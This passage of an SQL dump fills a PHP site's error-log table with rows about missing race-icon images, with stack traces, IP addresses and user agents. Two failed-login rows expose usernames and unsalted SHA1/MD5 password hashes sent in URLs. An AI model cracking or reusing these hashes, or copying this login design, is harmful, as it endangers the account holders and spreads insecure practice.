`time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (159, 'SYSTEM\\LOG\\ERROR', 'No matching Cat \'default_default\' found.', 'f316a4cf74f9aff7064c25adbe8e079235dfbf78', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 15, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_default\', \'border_tops_l.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_default\', \'border_tops_l.p...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.008, '2014-11-08 18:05:54', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=default_default&id=border_tops_l.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 16, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (160, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'default_default.png\' found.', '37e8bc80406feee9c247167a0b34a88f15861666', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'race\', \'default_default...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'race\', \'default_default...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.004, '2014-11-10 12:18:48', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=race&id=default_default.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 32, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (161, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'default_male.png\' found.', 'edc9450f92b42431f647a6aefeb7ee8a2f63efae', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'race\', \'default_male.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'race\', \'default_male.pn...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.008, '2014-11-10 03:05:05', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=race&id=default_male.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 6, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (162, 'SYSTEM\\LOG\\WARNING', 'Login Failed, User was not found in db', '53eb39cd76dff8495e11607350f395ec586de6f3', 1, '/home/mojotrolls/mojo_zero/src/web/system/security/Security.php', 39, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_login.php(21): SYSTEM\\SECURITY\\Security::login(\'THOTL\', \'0f47626adddd0eb...\', \'c65789a01af3517...\')\n#1 [internal function]: SYSTEM\\API\\api_login::call_account_action_login(\'THOTL\', \'0f47626adddd0eb...\', \'c65789a01af3517...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '92.29.134.210', 0.20401, '2015-05-16 20:28:14', 'www.mojotrollz.eu', 80, '/api.php?call=account&action=login&username=THOTL&password_sha=0f47626adddd0ebf6955356bc11cbb54e0719b3c&password_md5=c65789a01af351703b3ecbecdc4c5085', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 53, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (163, 'SYSTEM\\LOG\\ERROR', 'No call given for the api', '4b24349672933d739f273edb30af772bfa68d391', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 100, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(23): SYSTEM\\API\\api::do_default(false, \'api_mojotrollz\')\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#2 {main}', '62.24.181.134', 0.024, '2015-05-16 20:37:28', 'www.mojotrollz.eu', 80, '/api.php', 'a:0:{}', 'http://www.mojotrollz.eu/api.php', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)', 0, b'0', 0, 14, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (164, 'SYSTEM\\LOG\\WARNING', 'Login Failed, User was not found in db', '53eb39cd76dff8495e11607350f395ec586de6f3', 1, '/home/web/webdir/mojotrollz/system/security/Security.php', 39, '#0 /home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_login/saimod_sys_login.php(28): SYSTEM\\SECURITY\\Security::login(\'absolutseppl\', \'31c5e1b1e1c2b62...\', \'722ebac2131a9d3...\')\n#1 [internal function]: SYSTEM\\SAI\\saimod_sys_login::sai_mod__SYSTEM_SAI_saimod_sys_login_action_login(\'absolutseppl\', \'31c5e1b1e1c2b62...\', \'722ebac2131a9d3...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'\\\\SYSTEEM\\\\SAI\\\\sssai.\',Array, 42, true, false)\n#4 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#5 {main}', '37.24.151.115', 0.1, '2015-02-04 02:25:29', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_login&action=login&username=absolutseppl&password_sha=31c5e1b1e1c2b6238430aa516434a208ad8b6136&password_md5=722ebac2131a9d3eb85b5bc6861b8fe5', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B410 Safari/600.1.4', 0, b'0', 0, 86, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (165, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'gnome_male.png\' found.', 'c24a766796f2be412cb25dc311d1e6cf8d446831', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'gnome_male.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'gnome_male.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.064, '2014-11-10 02:01:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=gnome_male.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (166, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'dwarf_male.png\' found.', 'a5275e037955f75bdc0b02dfdf1968676686ace4', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'dwarf_male.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'dwarf_male.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.104, '2014-11-10 02:01:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=dwarf_male.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (167, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'human_female.png\' found.', '1cc59541e8710b4c612a1bbc29e06ff9f888d584', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'human_female.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'human_female.pn...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.124, '2014-11-10 02:01:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=human_female.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (168, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'gnome_female.png\' found.', '7b89957b1254a7f609623e198e2669f767d51baa', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'gnome_female.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'gnome_female.pn...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.12, '2014-11-10 02:01:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=gnome_female.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (169, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'dwarf_female.png\' found.', '1a60848a4097f458b5c0e9645415c07215262c19', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'dwarf_female.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'dwarf_female.pn...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.136, '2014-11-10 02:01:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=dwarf_female.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (170, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'undead_female.png\' found.', 'c4508e7d9317cdebee6f841ac27ccb85419e3c30', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'undead_female.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'undead_female.p...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.016, '2014-11-10 02:03:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=undead_female.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (171, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'undead_male.png\' found.', '5c1a462211a215e893d97136c625d441624637d5', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'undead_male.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'undead_male.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.016, '2014-11-10 02:03:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=undead_male.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (172, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'nightelf_female.png\' found.', '876b36cef8373988e13afc63dd5e8b51bf2c1e7e', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'nightelf_female...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'nightelf_female...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.012, '2014-11-10 02:01:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=nightelf_female.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (173, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'troll_male.png\' found.', '90031f4c711cc0e8e48cd6a9621a9ab7e6b1a54f', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'troll_male.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'troll_male.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.008, '2014-11-10 02:01:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=troll_male.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (174, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'troll_female.png\' found.', '2d5c993cbb5607535634cec48359f171cd839a1e', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'troll_female.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'troll_female.pn...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.012, '2014-11-10 02:01:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=troll_female.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (175, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ork_male.png\' found.', 'b324fcd034b75936d9341f5a2659984406e5e116', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'ork_male.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'ork_male.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.012, '2014-11-20 10:23:14', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=ork_male.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 36, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (176, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'tauren_female.png\' found.', 'fe1b8f3066390450c0deeefc7ead1453d9e4423b', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'tauren_female.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'tauren_female.p...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.012, '2014-11-10 02:01:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=tauren_female.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (177, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'tauren_male.png\' found.', '604f5a1f5ab64787a0d619843159e624801fdee4', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'tauren_male.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'tauren_male.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.012, '2014-11-10 02:01:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=tauren_male.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (178, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ork_female.png\' found.', 'cef9dd37b468f83c1392c8858622f0ba73a450b9', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'ork_female.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'ork_female.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.016, '2014-11-20 10:23:14', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=ork_female.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 35, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (179, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'race not valid_male.png\' found.', 'fcf86756c165e3664f3f1c5082419e5c8aec8f25', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'race\', \'race not valid_...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'race\', \'race not valid_...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.008, '2014-11-14 12:03:26', 'www.mojotrollz.eu', 80, 